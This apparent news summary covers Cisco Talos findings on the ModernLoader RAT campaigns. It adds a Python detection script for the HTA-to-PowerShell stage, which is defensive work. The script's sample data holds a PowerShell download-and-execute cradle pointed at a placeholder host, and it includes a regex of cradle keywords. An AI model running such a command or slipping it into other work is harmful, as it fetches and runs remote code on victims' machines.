According to Cisco Talos, between March and June 2022, hackers organized three related campaigns, delivering various malware to compromised machines, including the ModernLoader RAT, RedLine Stealer, and cryptocurrency miners.
First of all, the experts were interested in ModernLoader, which is designed to establish remote control over the victim’s computer and allows attackers to deploy additional malware, steal confidential information, or make the infected system part of a botnet.
Experts describe ModernLoader (also known as Avatar bot) as a very simple remote access trojan written in .NET. It can collect system information, execute arbitrary commands, and download and run files from the control server, which lets attackers swap malicious modules in real time.
Cisco Talos links ModernLoader attacks to previously unknown Russian-speaking attackers who use ready-made tools. Among the targets of the hackers were users from Eastern European countries (Bulgaria, Poland, Hungary and Russia).
For their attacks, the attackers attempt to hack vulnerable web applications, including WordPress and cPanel, and if successful, distribute malware under the guise of Amazon gift cards (of course, fake ones).
The first-stage payload is an HTML Application (HTA) file that launches a PowerShell script from the attackers’ control server to initiate the deployment of intermediate payloads, which eventually inject the malware into a process on the machine using the process hollowing technique.
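A detection check for that first stage, added here as an example (it is not code from Cisco Talos or from the campaign): it scans process-creation events for mshta.exe launching PowerShell with a download cradle or encoded command. The events are constructed, and the Sysmon-style field names are an assumption about how the SIEM exports them.

```python
# Added example: flag the HTA -> PowerShell stage in process-creation
# telemetry. Events are constructed; field names assume a Sysmon Event ID 1
# style export (ParentImage, Image, CommandLine).
import re

SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/stage2.ps1')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File C:\\Scripts\\inventory.ps1"},
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c echo hello"},
]

# Command-line fragments typical of a PowerShell download cradle or an
# encoded command; matched case-insensitively.
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|-enc", re.I)


def _basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def is_hta_powershell_stage(event):
    """True when mshta.exe spawns PowerShell that fetches or decodes content."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    if parent != "mshta.exe" or image not in ("powershell.exe", "pwsh.exe"):
        return False
    return bool(CRADLE.search(event.get("CommandLine", "")))


def find_suspicious(events):
    """Return the events that match the HTA -> PowerShell download pattern."""
    return [e for e in events if is_hta_powershell_stage(e)]


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print("suspicious:", hit["CommandLine"])
```

The parent-child pairing is the stable part of the pattern; tune the CRADLE fragments to the PowerShell usage seen in your own environment to keep false positives low.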
The Cisco Talos investigation also revealed two more malicious campaigns that took place in March 2022. They were built in much the same way and used ModernLoader as the main means of communication with the malware control server, infecting victims’ machines with additional malware, including XMRig, RedLine Stealer, SystemBC, DCRat, and a Discord token maker.